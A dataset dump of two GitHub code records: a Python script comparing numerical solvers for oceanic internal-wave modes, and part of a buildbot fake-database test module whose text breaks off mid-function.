np.diag(-1*dz2*np.ones((nz-1)),1)\n\n # BC's\n A[0,0] = -1.\n A[0,1] = 0.\n A[-1,-1] = -1.\n A[-1,-2] = 0.\n\n # Construct the RHS matrix i.e. put N^2 along diagonals\n B = np.diag(N2,0)\n\n # Solve... (use scipy not numpy)\n w, phi = linalg.eig(A, b=B, check_finite=False)\n #w, phi = linalg.eigh(A, b=B, check_finite=False)\n\n c = 1. / np.power(w, 0.5) # since term is ... 
+ N^2/c^2 \\phi\n\n    # Sort by the eigenvalues\n    idx = np.argsort(c)[::-1] # descending order\n\n    # Calculate the actual phase speed\n    cn = np.real( c[idx] )\n\n    return phi[:,idx], cn\n\n\n\ndef iwave_modes_sparse(N2, dz, k=None, Asparse=None, return_A=False, v0=None):\n    \"\"\"\n    Calculates the eigenvalues and eigenfunctions to the internal wave eigenvalue problem:\n    \n    $$\n    \\frac{d^2 \\phi}{dz^2} + \\frac{N^2}{c^2} \\phi = 0\n    $$\n    \n    with boundary conditions \\phi = 0 at the surface and the bottom.\n    \"\"\"\n\n    nz = N2.shape[0] # Remove the surface values\n    if k is None:\n        k = nz-2\n\n    if Asparse is None:\n        dz2 = 1/dz**2\n\n        # Construct the LHS matrix, A\n        A = np.vstack([-1*dz2*np.ones((nz,)),\\\n                2*dz2*np.ones((nz,)),\\\n                -1*dz2*np.ones((nz,)),\\\n            ])\n\n\n        # BC's\n        eps = 1e-10\n        #A[0,0] = -1.\n        #A[0,1] = 0.\n        #A[-1,-1] = -1.\n        #A[-1,-2] = 0.\n        A[1,0] = -1.\n        A[2,0] = 0.\n        A[1,-1] = -1.\n        A[0,-1] = 0.\n\n        Asparse = sparse.spdiags(A,[-1,0,1],nz,nz, format='csc')\n\n    # Construct the RHS matrix i.e. put N^2 along diagonals\n    #B = np.diag(N2,0)\n    B = sparse.spdiags(N2,[0],nz,nz, format='csc')\n    Binv = sparse.spdiags(1/N2,[0],nz,nz, format='csc')\n    \n    if v0 is not None:\n        w0 = 1/v0[0]**2.\n    else:\n        w0=None\n    #w, phi = sparse.linalg.eigsh(Asparse, M=B, Minv=Binv, which='SM', k=k, v0=None)\n    w, phi = sparse.linalg.eigsh(Asparse, M=B, sigma=1., k=k)\n    #w, phi = sparse.linalg.eigsh(Asparse, M=B, which='LM', k=k)\n\n    # Solve... (use scipy not numpy)\n    #w, phi = linalg.eig(A, b=B)\n\n    c = 1. / np.power(w, 0.5) # since term is ... + N^2/c^2 \\phi\n\n    # Sort by the eigenvalues\n    idx = np.argsort(c)[::-1] # descending order\n\n    # Calculate the actual phase speed\n    cn = np.real( c[idx] )\n\n\n    if return_A:\n        return np.real(phi), np.real(cn), Asparse\n    else:\n        return np.real(phi), np.real(cn)\n\n\n\n\ndef iwave_modes_tri(N2, dz, k=None):\n    \"\"\"\n    !!! DOES NOT WORK!!!\n    Calculates the eigenvalues and eigenfunctions to the internal wave eigenvalue problem:\n    \n    $$\n    \\frac{d^2 \\phi}{dz^2} + \\frac{N^2}{c^2} \\phi = 0\n    $$\n    \n    with boundary conditions \\phi = 0 at the surface and the bottom.\n    \"\"\"\n\n    nz = N2.shape[0] # Remove the surface values\n    if k is None:\n        k = nz-2\n\n    dz2 = 1/dz**2\n\n    # Construct the LHS matrix, A\n    Ao = -1*dz2*np.ones((nz-1,))\n    Am = 2*dz2*np.ones((nz,))\n\n    # BC's\n    Am[0] = -1.\n    Ao[0] = 0.\n    Am[-1] = -1.\n    Ao[-1] = 0.\n\n    # Now convert from a generalized eigenvalue problem to \n    # A.v = lambda.B.v\n    # a standard problem \n    # A.v = lambda.v\n    # by multiplying the LHS by the inverse of B\n    # (B^-1.A).v = lambda.v\n    # B^-1 = 1/N2 since B is diagonal\n    Am /= N2\n\n    w, phi = linalg.eigh_tridiagonal(Am, Ao)\n    \n\n    ## Main diagonal\n    #dd = 2*dz2*np.ones((nz,))\n\n    #dd /= N2\n\n    #dd[0] = -1\n    #dd[-1] = -1\n\n    ## Off diagonal\n    #ee = -1*dz2*np.ones((nz-1,))\n    #ee /= N2[0:-1]\n\n    #ee[0] = 0\n    #ee[-1] = 0\n\n\n    ## Solve... (use scipy not numpy)\n    #w, phi = linalg.eigh_tridiagonal(dd, ee )\n\n    #####\n\n    c = 1. / np.power(w, 0.5) # since term is ... 
+ N^2/c^2 \\phi\n\n    # Sort by the eigenvalues\n    idx = np.argsort(c)[::-1] # descending order\n\n    ## Calculate the actual phase speed\n    cn = np.real( c[idx] )\n\n    idxgood = ~np.isnan(cn)\n    phisort = phi[:,idx]\n\n    return np.real(phisort[:,idxgood]), np.real(cn[idxgood])\n\n\n\n\ndef iwave_modes_uneven(N2, z, k=None):\n    \"\"\"\n    Calculates the eigenvalues and eigenfunctions to the internal wave eigenvalue problem:\n    \n    $$\n    \\frac{d^2 \\phi}{dz^2} + \\frac{N^2}{c^2} \\phi = 0\n    $$\n    \n    with boundary conditions \\phi = 0 at the surface and the bottom.\n    \"\"\"\n\n    nz = N2.shape[0] \n    if k is None:\n        k = nz-2\n\n    dz = np.zeros((nz,))\n    zm = np.zeros((nz,))\n    dzm = np.zeros((nz,))\n\n    dz[0:-1] = z[0:-1] - z[1:]\n    zm[0:-1] = z[0:-1] - 0.5*dz[0:-1]\n\n    dzm[1:-1] = zm[0:-2] - zm[1:-1]\n    dzm[0] = dzm[1]\n    dzm[-1] = dzm[-2]\n\n    # Solve as a matrix\n    #A = np.zeros((nz,nz))\n    #for i in range(1,nz-1):\n    #    A[i,i] = 1/ (dz[i-1]*dzm[i]) + 1/(dz[i]*dzm[i])\n    #    A[i,i-1] = -1/(dz[i-1]*dzm[i])\n    #    A[i,i+1] = -1/(dz[i]*dzm[i])\n\n    # Solve as a banded matrix\n    A = np.zeros((nz,3))\n    for i in range(1,nz-1):\n        A[i,0] = 1/ (dz[i-1]*dzm[i]) + 1/(dz[i]*dzm[i])\n        A[i,1] = -1/(dz[i-1]*dzm[i])\n        A[i,2] = -1/(dz[i]*dzm[i])\n\n\n\n    # BC's\n    eps = 1e-10\n    #A[0,0] = -1.\n    #A[0,1] = 0.\n    #A[-1,-1] = -1.\n    #A[-1,-2] = 0.\n    A[0,0] = -1.\n    A[0,2] = 0.\n    A[-1,0] = -1.\n    A[-1,1] = 0.\n\n\n\n    Asparse = sparse.spdiags(A.T,[0,-1,1],nz,nz)\n\n    # Construct the RHS matrix i.e. put N^2 along diagonals\n    #B = np.diag(N2,0)\n    B = sparse.spdiags(N2,[0],nz,nz)\n\n    # Solve... (use scipy not numpy)\n    #w, phi = linalg.eig(A, b=B)\n    #w, phi = linalg.eig_banded(A, b=B)\n    w, phi = sparse.linalg.eigs(Asparse, M=B, which='SM', k=k)\n\n    ## Solve as a banded matrix\n    #A = np.zeros((3,nz))\n    #for i in range(1,nz-1):\n    #    A[1,i] = 1/ (dz[i-1]*dzm[i]) + 1/(dz[i]*dzm[i])\n    #    A[0,i-1] = -1/(dz[i-1]*dzm[i])\n    #    A[2,i+1] = -1/(dz[i]*dzm[i])\n\n    ### BC's\n    ##eps = 1e-10\n    ##A[0,0] = -1.\n    ##A[0,1] = 0.\n    ##A[-1,-1] = -1.\n    ##A[-1,-2] = 0.\n    #A[1,0] = -1\n    #A[1,-1] = -1\n\n\n\n    c = 1. / np.power(w, 0.5) # since term is ... + N^2/c^2 \\phi\n\n    # Sort by the eigenvalues\n    idx = np.argsort(c)[::-1] # descending order\n\n    # Calculate the actual phase speed\n    cn = np.real( c[idx] )\n\n    phiall = phi[:,idx]\n\n    # Normalize so the max(phi)=1\n    for ii in range(k):\n        phi_1 = phiall[:,ii]\n        phi_1 = phi_1 / np.abs(phi_1).max()\n        phi_1 *= np.sign(phi_1.sum())\n        phiall[:,ii] = phi_1\n\n    return phiall, cn\n\nd = 500\nNz = 50\nN0 = 0.01\n\nRHO0 = 1024.\nGRAV = 9.81\n\n# Create the density initial conditions\nz = np.linspace(0, d, Nz)\n\ndz = np.abs(z[1]-z[0])\n\n# Idealized density profile\n# drho, dp, Li, rho0\n#rhoz = ideal_rho(z, drho, dp, Li) + sig0 # Summer\n\nN = N0+0.000001*z\nN2 = N*N\ndrho_dz = -RHO0/GRAV * N2\n\n#N2mld = Nmld*Nmld\n#drho_dzmld = -RHO0/GRAV * N2mld\n\n# These are inputs into the eigenvalue solver\nrhoz = RHO0-1000. 
+ z*drho_dz\n\n# Initialise the class\n#IW = iwaves.IWaveModes(rhoz, -z[::-1])\n#\nmode = 0\n#phi, cn,_,Z= IW(-500, 10., mode)\ntic = time()\nfor ii in range(500):\n    phi, cn = iwave_modes(N2, dz)\nprint('Elapsed time dense method = {}'.format(time()-tic))\n\n\n\n## Test the uneven spaced algorithm\n#sout = np.zeros(Z.shape[0]-1,)\n#sout[0] = 1.\n#for ii in range(1,sout.shape[0]):\n#    sout[ii] = sout[ii-1]*1.0\n#\n#sout /= np.sum(sout)\n#dz = sout*d\n#znew = np.zeros(Z.shape)\n#znew[1:] = np.cumsum(-dz)\n#F = interpolate.interp1d(Z, IW.N2)\n#N2new = F(znew)\n#\n#phiall, cnall = iwave_modes_uneven(N2new, znew)\n\ntic = time()\ncnall = None\nfor ii in range(500):\n    phiall, cnall = iwave_modes_sparse(N2, dz, v0=cnall,k=6)\nprint('Elapsed time sparse method = {}'.format(time()-tic))\n\nplt.figure()\nplt.plot(phi[:,mode], -z,lw=3)\nplt.plot(phiall[:,mode],-z, color='r')\nplt.text(0.1, 0.1, 'c_%d = %3.2f m/s\\nc_%d = %3.2f m/s'%(mode+1, cn[mode],mode+1,cnall[mode]), \\\n    transform=plt.gca().transAxes)\nplt.show()\n", "repo_name": "mrayson/iwaves", "sub_path": "sandpit/test_iwaves.py", "file_name": "test_iwaves.py", "file_ext": "py", "file_size_in_byte": 8342, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.diag", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.linalg.eig", "line_number": 42, "usage_type": "call"}, {"api_name": "scipy.linalg", "line_number": 42, "usage_type": "name"}, {"api_name": "numpy.power", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 78, "usage_type": "call"}, {"api_name": "scipy.sparse.spdiags", "line_number": 93, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 93, "usage_type": "name"}, {"api_name": "scipy.sparse.spdiags", "line_number": 97, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 97, "usage_type": "name"}, {"api_name": "scipy.sparse.spdiags", "line_number": 98, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 98, "usage_type": "name"}, {"api_name": "scipy.sparse.linalg.eigsh", "line_number": 105, "usage_type": "call"}, {"api_name": "scipy.sparse.linalg", "line_number": 105, "usage_type": "attribute"}, {"api_name": "scipy.sparse", "line_number": 105, "usage_type": "name"}, {"api_name": "numpy.power", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.ones", 
"line_number": 148, "usage_type": "call"}, {"api_name": "scipy.linalg.eigh_tridiagonal", "line_number": 165, "usage_type": "call"}, {"api_name": "scipy.linalg", "line_number": 165, "usage_type": "name"}, {"api_name": "numpy.power", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 195, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 239, "usage_type": "call"}, {"api_name": "scipy.sparse.spdiags", "line_number": 260, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 260, "usage_type": "name"}, {"api_name": "scipy.sparse.spdiags", "line_number": 264, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 264, "usage_type": "name"}, {"api_name": "scipy.sparse.linalg.eigs", "line_number": 269, "usage_type": "call"}, {"api_name": "scipy.sparse.linalg", "line_number": 269, "usage_type": "attribute"}, {"api_name": "scipy.sparse", "line_number": 269, "usage_type": "name"}, {"api_name": "numpy.power", "line_number": 289, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 302, "usage_type": "call"}, {"api_name": "numpy.sign", "line_number": 303, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 316, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 318, "usage_type": "call"}, {"api_name": "time.time", "line_number": 339, "usage_type": "call"}, {"api_name": "time.time", "line_number": 342, "usage_type": "call"}, {"api_name": "time.time", "line_number": 361, "usage_type": "call"}, {"api_name": "time.time", "line_number": 365, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 367, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 367, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 368, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 368, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 369, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 369, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 370, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 370, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 371, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 371, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 372, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 372, "usage_type": "name"}]} +{"seq_id": "13056583406", "text": "import base64\nimport copy\n\nfrom buildbot.db import buildrequests\nfrom buildbot.util import datetime2epoch\nfrom buildbot.util import json\nfrom copy import deepcopy\nfrom twisted.internet import defer\nfrom twisted.internet import reactor\n\n# Fake DB Rows\n\n\nclass Row(object):\n\n \"\"\"\n Parent class for row classes, which are used to specify test data for\n database-related tests.\n\n @cvar 
defaults: default values for columns\n @type defaults: dictionary\n\n @cvar table: the table name\n\n @cvar id_column: specify a column that should be assigned an\n auto-incremented id. Auto-assigned id's begin at 1000, so any explicitly\n specified ID's should be less than 1000.\n\n @cvar required_columns: a tuple of columns that must be given in the\n constructor\n\n @ivar values: the values to be inserted into this row\n \"\"\"\n\n id_column = ()\n required_columns = ()\n lists = ()\n dicts = ()\n\n def __init__(self, **kwargs):\n self.values = self.defaults.copy()\n self.values.update(kwargs)\n if self.id_column:\n if self.values[self.id_column] is None:\n self.values[self.id_column] = self.nextId()\n for col in self.required_columns:\n assert col in kwargs, \"%s not specified: %s\" % (col, kwargs)\n for col in self.lists:\n setattr(self, col, [])\n for col in self.dicts:\n setattr(self, col, {})\n for col in kwargs.keys():\n assert col in self.defaults, \"%s is not a valid column\" % col\n # make the values appear as attributes\n self.__dict__.update(self.values)\n\n def nextId(self):\n if not hasattr(self.__class__, '_next_id'):\n self.__class__._next_id = 1000\n else:\n self.__class__._next_id += 1\n return self.__class__._next_id\n\n\nclass BuildRequest(Row):\n table = \"buildrequests\"\n\n defaults = dict(\n id=None,\n buildsetid=None,\n buildername=\"bldr\",\n priority=0,\n complete=0,\n results=-1,\n submitted_at=0,\n complete_at=0,\n )\n\n id_column = 'id'\n required_columns = ('buildsetid',)\n\n\nclass BuildRequestClaim(Row):\n table = \"buildrequest_claims\"\n\n defaults = dict(\n brid=None,\n objectid=None,\n claimed_at=None\n )\n\n required_columns = ('brid', 'objectid', 'claimed_at')\n\n\nclass Change(Row):\n table = \"changes\"\n\n defaults = dict(\n changeid=None,\n author='frank',\n comments='test change',\n is_dir=0,\n branch='master',\n revision='abcd',\n revlink='http://vc/abcd',\n when_timestamp=1200000,\n category='cat',\n repository='repo',\n codebase='',\n project='proj'\n )\n\n lists = ('files',)\n dicts = ('properties',)\n id_column = 'changeid'\n\n\nclass ChangeFile(Row):\n table = \"change_files\"\n\n defaults = dict(\n changeid=None,\n filename=None,\n )\n\n required_columns = ('changeid',)\n\n\nclass ChangeProperty(Row):\n table = \"change_properties\"\n\n defaults = dict(\n changeid=None,\n property_name=None,\n property_value=None,\n )\n\n required_columns = ('changeid',)\n\n\nclass ChangeUser(Row):\n table = \"change_users\"\n\n defaults = dict(\n changeid=None,\n uid=None,\n )\n\n required_columns = ('changeid',)\n\n\nclass Patch(Row):\n table = \"patches\"\n\n defaults = dict(\n id=None,\n patchlevel=0,\n patch_base64='aGVsbG8sIHdvcmxk', # 'hello, world',\n patch_author=None,\n patch_comment=None,\n subdir=None,\n )\n\n id_column = 'id'\n\n\nclass SourceStampChange(Row):\n table = \"sourcestamp_changes\"\n\n defaults = dict(\n sourcestampid=None,\n changeid=None,\n )\n\n required_columns = ('sourcestampid', 'changeid')\n\n\nclass SourceStampSet(Row):\n table = \"sourcestampsets\"\n defaults = dict(\n id=None,\n )\n id_column = 'id'\n\n\nclass SourceStamp(Row):\n table = \"sourcestamps\"\n\n defaults = dict(\n id=None,\n branch='master',\n revision='abcd',\n patchid=None,\n repository='repo',\n codebase='',\n project='proj',\n sourcestampsetid=None,\n )\n\n id_column = 'id'\n\n\nclass SchedulerChange(Row):\n table = \"scheduler_changes\"\n\n defaults = dict(\n objectid=None,\n changeid=None,\n important=1,\n )\n\n required_columns = ('objectid', 
'changeid')\n\n\nclass Buildset(Row):\n table = \"buildsets\"\n\n defaults = dict(\n id=None,\n external_idstring='extid',\n reason='because',\n sourcestampsetid=None,\n submitted_at=12345678,\n complete=0,\n complete_at=None,\n results=-1,\n )\n\n id_column = 'id'\n required_columns = ('sourcestampsetid', )\n\n\nclass BuildsetProperty(Row):\n table = \"buildset_properties\"\n\n defaults = dict(\n buildsetid=None,\n property_name='prop',\n property_value='[22, \"fakedb\"]',\n )\n\n required_columns = ('buildsetid', )\n\n\nclass Buildslave(Row):\n table = \"buildslaves\"\n\n defaults = dict(\n id=None,\n name='slave1',\n info=None,\n )\n\n id_column = 'id'\n required_columns = ('name', )\n\n\nclass Object(Row):\n table = \"objects\"\n\n defaults = dict(\n id=None,\n name='nam',\n class_name='cls',\n )\n\n id_column = 'id'\n\n\nclass ObjectState(Row):\n table = \"object_state\"\n\n defaults = dict(\n objectid=None,\n name='nam',\n value_json='{}',\n )\n\n required_columns = ('objectid', )\n\n\nclass User(Row):\n table = \"users\"\n\n defaults = dict(\n uid=None,\n identifier='soap',\n bb_username=None,\n bb_password=None,\n )\n\n id_column = 'uid'\n\n\nclass UserInfo(Row):\n table = \"users_info\"\n\n defaults = dict(\n uid=None,\n attr_type='git',\n attr_data='Tyler Durden ',\n )\n\n required_columns = ('uid', )\n\n\nclass Build(Row):\n table = \"builds\"\n\n defaults = dict(\n id=None,\n number=29,\n brid=39,\n start_time=1304262222,\n finish_time=None)\n\n id_column = 'id'\n\n# Fake DB Components\n\n# TODO: test these using the same test methods as are used against the real\n# database\n\n\nclass FakeDBComponent(object):\n\n def __init__(self, db, testcase):\n self.db = db\n self.t = testcase\n self.setUp()\n\n\nclass FakeChangesComponent(FakeDBComponent):\n\n def setUp(self):\n self.changes = {}\n\n def insertTestData(self, rows):\n for row in rows:\n if isinstance(row, Change):\n # copy this since we'll be modifying it (e.g., adding files)\n ch = self.changes[row.changeid] = copy.deepcopy(row.values)\n ch['files'] = []\n ch['properties'] = {}\n ch['uids'] = []\n\n elif isinstance(row, ChangeFile):\n ch = self.changes[row.changeid]\n ch['files'].append(row.filename)\n\n elif isinstance(row, ChangeProperty):\n ch = self.changes[row.changeid]\n n, vs = row.property_name, row.property_value\n v, s = json.loads(vs)\n ch['properties'][n] = (v, s)\n\n elif isinstance(row, ChangeUser):\n ch = self.changes[row.changeid]\n ch['uids'].append(row.uid)\n\n # component methods\n\n def addChange(self, author=None, files=None, comments=None, is_dir=0,\n revision=None, when_timestamp=None, branch=None,\n category=None, revlink='', properties={}, repository='',\n project='', codebase='', uid=None):\n if self.changes:\n changeid = max(self.changes.iterkeys()) + 1\n else:\n changeid = 500\n\n self.changes[changeid] = dict(\n changeid=changeid,\n author=author,\n comments=comments,\n is_dir=is_dir,\n revision=revision,\n when_timestamp=datetime2epoch(when_timestamp),\n branch=branch,\n category=category,\n revlink=revlink,\n repository=repository,\n project=project,\n codebase=codebase,\n files=files,\n properties=properties)\n\n return defer.succeed(changeid)\n\n def getLatestChangeid(self):\n if self.changes:\n return defer.succeed(max(self.changes.iterkeys()))\n return defer.succeed(None)\n\n def getChange(self, changeid):\n try:\n row = self.changes[changeid]\n except KeyError:\n return defer.succeed(None)\n\n return defer.succeed(self._chdict(row))\n\n def getChangeUids(self, changeid):\n try:\n 
ch_uids = self.changes[changeid]['uids']\n except KeyError:\n ch_uids = []\n return defer.succeed(ch_uids)\n\n def getRecentChanges(self, count):\n ids = sorted(self.changes.keys())\n chdicts = [self._chdict(self.changes[id]) for id in ids[-count:]]\n return defer.succeed(chdicts)\n\n def getChanges(self):\n chdicts = [self._chdict(v) for v in self.changes.values()]\n return defer.succeed(chdicts)\n\n def getChangesCount(self):\n return len(self.changes)\n\n def _chdict(self, row):\n chdict = row.copy()\n del chdict['uids']\n chdict['when_timestamp'] = _mkdt(chdict['when_timestamp'])\n return chdict\n\n # assertions\n\n def assertChange(self, changeid, row):\n row_only = self.changes[changeid].copy()\n del row_only['files']\n del row_only['properties']\n del row_only['uids']\n self.t.assertEqual(row_only, row.values)\n\n def assertChangeUsers(self, changeid, expectedUids):\n self.t.assertEqual(self.changes[changeid]['uids'], expectedUids)\n\n # fake methods\n\n def fakeAddChangeInstance(self, change):\n if not hasattr(change, 'number') or not change.number:\n if self.changes:\n changeid = max(self.changes.iterkeys()) + 1\n else:\n changeid = 500\n else:\n changeid = change.number\n\n # make a row from the change\n row = dict(\n changeid=changeid,\n author=change.who,\n files=change.files,\n comments=change.comments,\n is_dir=change.isdir,\n revision=change.revision,\n when_timestamp=change.when,\n branch=change.branch,\n category=change.category,\n revlink=change.revlink,\n properties=change.properties,\n repository=change.repository,\n codebase=change.codebase,\n project=change.project,\n uids=[])\n self.changes[changeid] = row\n\n\nclass FakeSchedulersComponent(FakeDBComponent):\n\n def setUp(self):\n self.states = {}\n self.classifications = {}\n\n def insertTestData(self, rows):\n for row in rows:\n if isinstance(row, SchedulerChange):\n cls = self.classifications.setdefault(row.objectid, {})\n cls[row.changeid] = row.important\n\n # component methods\n\n def classifyChanges(self, objectid, classifications):\n self.classifications.setdefault(objectid, {}).update(classifications)\n return defer.succeed(None)\n\n def flushChangeClassifications(self, objectid, less_than=None):\n if less_than is not None:\n classifications = self.classifications.setdefault(objectid, {})\n for changeid in classifications.keys():\n if changeid < less_than:\n del classifications[changeid]\n else:\n self.classifications[objectid] = {}\n return defer.succeed(None)\n\n def getChangeClassifications(self, objectid, branch=-1, repository=-1,\n project=-1, codebase=-1):\n classifications = self.classifications.setdefault(objectid, {})\n\n sentinel = dict(branch=object(), repository=object(),\n project=object(), codebase=object())\n\n if branch != -1:\n # filter out the classifications for the requested branch\n classifications = dict(\n (k, v) for (k, v) in classifications.iteritems()\n if self.db.changes.changes.get(k, sentinel)['branch'] == branch)\n\n if repository != -1:\n # filter out the classifications for the requested branch\n classifications = dict(\n (k, v) for (k, v) in classifications.iteritems()\n if self.db.changes.changes.get(k, sentinel)['repository'] == repository)\n\n if project != -1:\n # filter out the classifications for the requested branch\n classifications = dict(\n (k, v) for (k, v) in classifications.iteritems()\n if self.db.changes.changes.get(k, sentinel)['project'] == project)\n\n if codebase != -1:\n # filter out the classifications for the requested branch\n classifications = dict(\n 
(k, v) for (k, v) in classifications.iteritems()\n if self.db.changes.changes.get(k, sentinel)['codebase'] == codebase)\n\n return defer.succeed(classifications)\n\n # fake methods\n\n def fakeClassifications(self, objectid, classifications):\n \"\"\"Set the set of classifications for a scheduler\"\"\"\n self.classifications[objectid] = classifications\n\n # assertions\n\n def assertClassifications(self, objectid, classifications):\n self.t.assertEqual(\n self.classifications.get(objectid, {}),\n classifications)\n\n\nclass FakeSourceStampSetsComponent(FakeDBComponent):\n\n def setUp(self):\n self.sourcestampsets = {}\n\n def insertTestData(self, rows):\n for row in rows:\n if isinstance(row, SourceStampSet):\n self.sourcestampsets[row.id] = dict()\n\n def addSourceStampSet(self):\n id = len(self.sourcestampsets) + 100\n while id in self.sourcestampsets:\n id += 1\n self.sourcestampsets[id] = dict()\n return defer.succeed(id)\n\n\nclass FakeSourceStampsComponent(FakeDBComponent):\n\n def setUp(self):\n self.sourcestamps = {}\n self.patches = {}\n\n def insertTestData(self, rows):\n for row in rows:\n if isinstance(row, Patch):\n self.patches[row.id] = dict(\n patch_level=row.patchlevel,\n patch_body=base64.b64decode(row.patch_base64),\n patch_author=row.patch_author,\n patch_comment=row.patch_comment,\n patch_subdir=row.subdir)\n\n for row in rows:\n if isinstance(row, SourceStamp):\n ss = self.sourcestamps[row.id] = row.values.copy()\n ss['changeids'] = set()\n\n for row in rows:\n if isinstance(row, SourceStampChange):\n ss = self.sourcestamps[row.sourcestampid]\n ss['changeids'].add(row.changeid)\n\n # component methods\n\n def addSourceStamp(self, branch, revision, repository, project, sourcestampsetid,\n codebase='', patch_body=None, patch_level=0, patch_author=None,\n patch_comment=None, patch_subdir=None, changeids=[]):\n id = len(self.sourcestamps) + 100\n while id in self.sourcestamps:\n id += 1\n\n changeids = set(changeids)\n\n if patch_body:\n patchid = len(self.patches) + 100\n while patchid in self.patches:\n patchid += 1\n self.patches[patchid] = dict(\n patch_level=patch_level,\n patch_body=patch_body,\n patch_subdir=patch_subdir,\n patch_author=patch_author,\n patch_comment=patch_comment\n )\n else:\n patchid = None\n\n self.sourcestamps[id] = dict(id=id, sourcestampsetid=sourcestampsetid, branch=branch, revision=revision, codebase=codebase,\n patchid=patchid, repository=repository, project=project,\n changeids=changeids)\n return defer.succeed(id)\n\n def getSourceStamp(self, ssid):\n return defer.succeed(self._getSourceStamp(ssid))\n\n def _getSourceStamp(self, ssid):\n if ssid in self.sourcestamps:\n ssdict = self.sourcestamps[ssid].copy()\n del ssdict['id']\n ssdict['ssid'] = ssid\n patchid = ssdict['patchid']\n if patchid:\n ssdict.update(self.patches[patchid])\n else:\n ssdict['patch_body'] = None\n ssdict['patch_level'] = None\n ssdict['patch_subdir'] = None\n ssdict['patch_author'] = None\n ssdict['patch_comment'] = None\n del ssdict['patchid']\n return ssdict\n else:\n return None\n\n def getSourceStamps(self, sourcestampsetid):\n sslist = []\n for ssdict in self.sourcestamps.itervalues():\n if ssdict['sourcestampsetid'] == sourcestampsetid:\n ssdictcpy = self._getSourceStamp(ssdict['id'])\n sslist.append(ssdictcpy)\n return defer.succeed(sslist)\n\n\nclass FakeBuildsetsComponent(FakeDBComponent):\n\n def setUp(self):\n self.buildsets = {}\n self.completed_bsids = set()\n self.buildset_subs = []\n\n def insertTestData(self, rows):\n for row in rows:\n if 
isinstance(row, Buildset):\n bs = self.buildsets[row.id] = row.values.copy()\n bs['properties'] = {}\n\n for row in rows:\n if isinstance(row, BuildsetProperty):\n assert row.buildsetid in self.buildsets\n n = row.property_name\n v, src = tuple(json.loads(row.property_value))\n self.buildsets[row.buildsetid]['properties'][n] = (v, src)\n\n # component methods\n\n def _newBsid(self):\n bsid = 200\n while bsid in self.buildsets:\n bsid += 1\n return bsid\n\n def addBuildset(self, sourcestampsetid, reason, properties, builderNames,\n external_idstring=None, _reactor=reactor):\n bsid = self._newBsid()\n br_rows = []\n for buildername in builderNames:\n br_rows.append(\n BuildRequest(buildsetid=bsid, buildername=buildername))\n self.db.buildrequests.insertTestData(br_rows)\n\n # make up a row and keep its dictionary, with the properties tacked on\n bsrow = Buildset(sourcestampsetid=sourcestampsetid, reason=reason, external_idstring=external_idstring)\n self.buildsets[bsid] = bsrow.values.copy()\n self.buildsets[bsid]['properties'] = properties\n\n return defer.succeed((bsid,\n dict([(br.buildername, br.id) for br in br_rows])))\n\n def completeBuildset(self, bsid, results, complete_at=None,\n _reactor=reactor):\n self.buildsets[bsid]['results'] = results\n self.buildsets[bsid]['complete'] = 1\n self.buildsets[bsid]['complete_at'] = complete_at or _reactor.seconds()\n return defer.succeed(None)\n\n def getBuildset(self, bsid):\n if bsid not in self.buildsets:\n return defer.succeed(None)\n row = self.buildsets[bsid]\n return defer.succeed(self._row2dict(row))\n\n def getBuildsets(self, complete=None):\n rv = []\n for bs in self.buildsets.itervalues():\n if complete is not None:\n if complete and bs['complete']:\n rv.append(self._row2dict(bs))\n elif 